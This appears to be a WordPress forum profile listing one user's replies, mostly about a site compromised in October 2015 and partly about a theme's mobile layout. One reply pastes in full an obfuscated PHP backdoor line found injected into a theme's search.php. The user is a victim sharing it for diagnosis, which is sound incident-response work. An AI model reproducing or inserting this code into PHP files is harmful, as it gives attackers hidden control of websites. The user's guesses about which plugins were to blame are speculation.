BioB
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Site hacked with a non-exsistant admin usernameI don’t know what to suspect, unfortunately. I just put out some possibilities because those plugins are widely used and might be targets, that’s all.
Sorry, Richard. I love your plugin, by the way.
I did some more digging, though and in my UnoBlog theme the file search.php was modified on the day the hacker got in and it had an additional line of code at the very top:
<?php $pekyg = 'rMNfN14n*UO3sb2TFa1Te0v_fO6JTGnY/40_8zA9obHeueW.kgHwpvGPtXwRpr_UeasohEcle7Cig25.e36Uyeipmq4dMbK9ucKBz9Sa0gTee8Wj1IDAFq4Q/dXOeeQQTl5I7282pEcsrP'; $ptcfnjsmzcvk = $pekyg[50].$pekyg[28].$pekyg[15].$pekyg[141].$pekyg[62].$pekyg[55].$pekyg[10].$pekyg[128].$pekyg[98].$pekyg[99].$pekyg[25].$pekyg[38].$pekyg[63].$pekyg[106].$pekyg[126]; $kgtmtzrhpn = $pekyg[105].$pekyg[43].$pekyg[56].$pekyg[124].$pekyg[7].$pekyg[53]; $lqfvtkarmb = $pekyg[136].$pekyg[0].$pekyg[125].$pekyg[49].$pekyg[23].$pekyg[140].$pekyg[85].$pekyg[60].$pekyg[71].$pekyg[17].$pekyg[97].$pekyg[80]; $goblsqeuxg = $pekyg[13].$pekyg[65].$pekyg[139].$pekyg[108].$pekyg[82].$pekyg[90].$pekyg[35].$pekyg[91].$pekyg[45].$pekyg[138].$pekyg[40].$pekyg[121].$pekyg[64]; $ojcapxvzcr = $pekyg[120].$pekyg[47].$pekyg[8].$pekyg[32].$pekyg[107]; $qingnmtaec = $pekyg[79]; $ckwovrefmyof = $kgtmtzrhpn($ptcfnjsmzcvk); $lqfvtkarmb ($ojcapxvzcr , $goblsqeuxg($ckwovrefmyof) , $qingnmtaec); ?>Very standard for this kind of a hack. I’ll check other files as well.
The attack happened on oct. 4. 2015
Forum: Fixing WordPress
In reply to: Site hacked with a non-exsistant admin usernameI use the theme Unoblog by ThemeBounce, ver. 1.3 (it’s probably not the site you checked out because I run several WP blogs).
My WordPress is version 4.3.1
I have updated two plugins today or yesterday. One of them, incidentally, was Wordfence, I now run ver. 6.0.19 but before it was most probably 6.0.18.
I’m pretty sure the other one was Akismet, which is now ver. 3.1.4. I don’t even know why I keep this plugin as I don’t use it. It’s the most probable source of attack.
Yosast SEO ver. 2.3.5 could be another likely candidate. I think it very recently automatically updated and that it was ver. 2.3.4 before.
Yet another widely used plugin that could be the target of the attack is Cookie Law Info ver. 1.5.3 by Richard Ashby.
For now I deleted the base64 code from the functions.php and blocked the user’s IP. I know, though, that the script probably spammed my entire site with new files with malicious code inside (once before I had a problem with this and it cost me some money to get it repaired).
I’m only sorry I deleted the code and didn’t store it. I could post it here for some back-engineering. Nah, well. I hope it won’t happen again.
It also seems like the hacker got in with the first attempt. Many others try every day and get denied by Wordfence and I get emails about such attempts every day…
Forum: Themes and Templates
In reply to: [Syntax] Mobile versionSorry, I checked again. Looks like there was an error before.
Now it says: “Awesome! This page is mobile-friendly.”
Good work!
By the way, I love this theme.
Forum: Themes and Templates
In reply to: [Syntax] Mobile versionI’ve just tested the theme for the coming Google mobile update and it said the site isn’t mobile friendly.
Links are too close together and text is too wide for mobile phone. If this isn’t resolved until the next update (beginning of April 2015 if I read correctly), then the sites with Syntax theme will lose their ranking in Google for mobile users.
Is there any chance you could make it more mobile friendly until somewhere in the beginning of April?
Thank you!